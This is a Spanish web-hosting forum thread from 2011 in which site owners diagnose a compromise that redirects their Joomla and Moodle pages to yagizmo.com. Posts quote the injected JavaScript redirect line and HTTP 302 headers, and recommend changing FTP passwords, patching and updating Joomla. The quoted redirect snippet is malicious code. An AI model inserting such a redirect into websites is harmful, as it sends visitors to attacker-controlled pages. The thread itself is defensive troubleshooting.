Foros del Web » Administración de Sistemas » Software para Servers »

Servidor dedicado atacado por sitio yagizmo.com

Estas en el tema de Servidor dedicado atacado por sitio yagizmo.com en el foro de Software para Servers en Foros del Web. Mi sitio ha sido atacado y al hacer click sobre sus páginas aparecen peticiones de yagizmo.com Incluso hubo una página en donde el navegador de ...
  #1 (permalink)  
Antiguo 12/01/2011, 15:59
 
Fecha de Ingreso: julio-2007
Ubicación: CUENCA - ECUADOR
Mensajes: 61
Antigüedad: 17 años, 3 meses
Puntos: 0
Pregunta Servidor dedicado atacado por sitio yagizmo.com

Mi sitio ha sido atacado y al hacer click sobre sus páginas aparecen peticiones de yagizmo.com


Incluso hubo una página en donde el navegador de mozilla me bloqueaba el acceso!...

Me pueden ayudar a poder decifrar como puedo arreglar el problema!...


Trabajo con php y mysql...

Saludos
  #2 (permalink)  
Antiguo 12/01/2011, 16:46
 
Fecha de Ingreso: enero-2011
Mensajes: 5
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

A mi me ha pasado justo lo mismo HOY con joomla!.
Servidor dedicado en 1&1 (me han cambiado de server justo ayer)
Estoy investigando, lo comparto....

te puede interesar: http://wam.dasient.com/wam/infection_library/7a9ac98597d186c951ee4ca3fdaf20c0/ljjjo

http://www.stopbadware.org/d52ed85a09ab78f3d2a23318fb36c33f

The three most common forms of badware that StopBadware sees on compromised sites are:

Malicious scripts
.htaccess redirects
Hidden iframes

Más en: http://www.stopbadware.org/home/security

Suerte

Última edición por nolink; 12/01/2011 a las 16:51
  #3 (permalink)  
Antiguo 12/01/2011, 17:09
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Verifique el computador desde el cual se conectan por ftp a su sitio web, es posible que esté infectado por un virus que roba los datos de sus cuentas ftp y las reenvia a hackers, cambie las cuentas ftp de sus sitios desde un computador limpio.

Nunca guarde los password de su cuenta ftp en los clientes ftp
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #4 (permalink)  
Antiguo 12/01/2011, 17:50
 
Fecha de Ingreso: enero-2011
Mensajes: 5
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Pues he leido todo el codigo y nada de na!. Para mi que va ser el .htaccess redirects
  #5 (permalink)  
Antiguo 12/01/2011, 18:06
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Si, es posible que usando un .htaccess hagan una redirección de tu sitio a otro servidor.
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #6 (permalink)  
Antiguo 13/01/2011, 02:44
 
Fecha de Ingreso: enero-2011
Mensajes: 1
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

¿Habéis conseguido solucionar el problema? A mí me ha pasado lo mismo con la intranet de alumnos del colegio en el que trabajo (la tenemos alojada con una empresa externa que nos da el servicio, es un Moodle bajo Linux).

Ya les he avisado, pero si lo habéis solucionado de algún modo, cualquier información que les pueda pasar para acelerar el arreglo será bienvenida. Lo que más me fastidia es que, como es un servidor externo, no tengo acceso al sistema de archivos y no puedo mirar .htaccess ni nada por el estilo (he revisado el código de las páginas, nuestras DNS por si alguien se había metido en el servidor y había metido alguna redirección, etc., y nada, así que supongo que tiene que ser a nivel de .htaccess o de la configuración de Apache).

Gracias!
  #7 (permalink)  
Antiguo 13/01/2011, 05:38
 
Fecha de Ingreso: enero-2011
Mensajes: 5
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

HTTP Response Header

Name Value Delim
Mi hosting dice que es un Javascrit malicioso que se ha incluido en el código. Aunque he comprobado el código y no he encontrado nada extraño del tipo

document.location.href='http://yagizmo.com/'+Math.floor(Math.random()*10000)

En cambio haciendo un Scan al server me da HTTP/1.1 302 Found y me indica la redirección que hacemos mención. Desde aquí: http://web-sniffer.net/

¿ Tenéis el mismo problema? ¿ Trabajáis con revendedores?

Status: HTTP/1.1 302 Found
Date: Thu, 13 Jan 2011 11:33:09 GMT
Server: Apache
Location: http://yagizmo.com/188.93.10.56
Content-Length: 215
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content (0.21 KiB)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://yagizmo.com/188.93.10.56">here</a>.</p>
</body></html>
  #8 (permalink)  
Antiguo 13/01/2011, 05:57
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Puedes mencionarnos tu dominio, si deseas me lo envías por MP y te ayudo a verificar el problema del script que se agrega a tus paginas
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #9 (permalink)  
Antiguo 13/01/2011, 06:16
 
Fecha de Ingreso: enero-2011
Mensajes: 5
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Mil gracias por tu amabilidad, te lo paso por MP. A ver si te ocurre algo....
  #10 (permalink)  
Antiguo 13/01/2011, 06:33
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Respondido tu MP
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #11 (permalink)  
Antiguo 13/01/2011, 08:19
 
Fecha de Ingreso: julio-2007
Ubicación: CUENCA - ECUADOR
Mensajes: 61
Antigüedad: 17 años, 3 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Hola a todos veo que a muchos les está pasando el mismo problema, ayer revisando pudimos encontrar el problema. Me parece que es una especie de virus como mencionan todos aquí.

Se genera un .htaccess redirects, el mismo que se genera en las carpetas en donde el usuario tiene permisos para lectura y escritura. En nuestro caso tenemos carpetas donde están las imágenes y ahi se generaba ese .htaccess con la redirección respectiva, procedimos a eliminar estas redirecciones en todas las carpetas afectadas y ya empezaban aparecer las imágenes que se perdían...

Ahora vamos a chekar las máquinas con las cuales hacemos ftp para revisar si existen virus que al hacer ftp pueden esta afectando al servidor en línea....

Si tienen sugerencias de que tipo de virus puede ser o el antivirus adecuado que pueda tratar estos archivos infeccios que me puedan recomendar...

Muy agradecido!...

Espero todos puedan también solucionar el problema....
  #12 (permalink)  
Antiguo 13/01/2011, 08:23
 
Fecha de Ingreso: julio-2007
Ubicación: CUENCA - ECUADOR
Mensajes: 61
Antigüedad: 17 años, 3 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Hola a todos veo que a muchos les está pasando el mismo problema, ayer revisando pudimos encontrar el problema. Me parece que es una especie de virus como mencionan todos aquí.

Se genera un .htaccess redirects, el mismo que se genera en las carpetas en donde el usuario tiene permisos para lectura y escritura. En nuestro caso tenemos carpetas donde están las imágenes y ahi se generaba ese .htaccess con la redirección respectiva, procedimos a eliminar estas redirecciones en todas las carpetas afectadas y ya empezaban aparecer las imágenes que se perdían...

Ahora vamos a chekar las máquinas con las cuales hacemos ftp para revisar si existen virus que al hacer ftp pueden esta afectando al servidor en línea....

Si tienen sugerencias de que tipo de virus puede ser o el antivirus adecuado que pueda tratar estos archivos infeccios que me puedan recomendar...

Muy agradecido!...

Espero todos puedan también solucionar el problema....
  #13 (permalink)  
Antiguo 13/01/2011, 09:03
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

El virus puede ser gumblar o uno muy similar, yo le había mencionado a nolink por MP que el problema era un archivo htaccess que hace la redirección.

Ese es el encabezado http del sitio

Cita:
HTTP/1.1·302·Found(CR)(LF)
Date:·Thu,·13·Jan·2011·13:21:42·GMT(CR)(LF)
Server:·Apache(CR)(LF)
Location:·http://yagizmo.com/69.xx.187.xx
Instala todos los parches a tu Windows, cambia las claves de tu cuenta ftp, corre un antivirus, intenta con HouseCall de Trend Micro
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #14 (permalink)  
Antiguo 13/01/2011, 18:57
 
Fecha de Ingreso: enero-2011
Mensajes: 1
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Ya somos unos cuantos con el mismo problema.

Tened cuidado, porque donde se aloja el código:

Código:
document.location.href='http://yagizmo.com/'+Math.floor(Math.random()*10000)
es dentro de la base de datos, por lo que restaurando la BBDD de MySQL la web vuelve a funcionar sin problema, aunque sigue siendo vulnerable,

¿Alguien sabe de dónde viene la vulnerabilidad? ¿De alguna versión concreta de joomla o drupal? ¿De algún virus?


Un saludo,
  #15 (permalink)  
Antiguo 13/01/2011, 19:34
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 2 meses
Puntos: 68
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Si, parece que aprovecha alguna vulnerabilidad de joomla, he visto 2 clientes en la misma situación. Actualiza joomla a la última versión.
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #16 (permalink)  
Antiguo 15/01/2011, 09:52
 
Fecha de Ingreso: enero-2011
Mensajes: 5
Antigüedad: 13 años, 9 meses
Puntos: 0
Respuesta: Servidor dedicado atacado por sitio yagizmo.com

Si se aloja dentro de la BBDD afectaría solo aquella tabla que estuviera insertada. Como habrás leído el problema es en todo el dominio.

Os dejo un enlace donde ofrecen un punto de vista más interesante: http://www.hard-h2o.com/vertema/134248/creacion-htaccess-en-joomla-automaticamente.html

Saludos



Cita:
Iniciado por arcm Ver Mensaje
Ya somos unos cuantos con el mismo problema.

Tened cuidado, porque donde se aloja el código:

Código:
document.location.href='http://yagizmo.com/'+Math.floor(Math.random()*10000)
es dentro de la base de datos, por lo que restaurando la BBDD de MySQL la web vuelve a funcionar sin problema, aunque sigue siendo vulnerable,

¿Alguien sabe de dónde viene la vulnerabilidad? ¿De alguna versión concreta de joomla o drupal? ¿De algún virus?


Un saludo,

Etiquetas: ataques, mysql, php, yagizmo.com
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 15:24.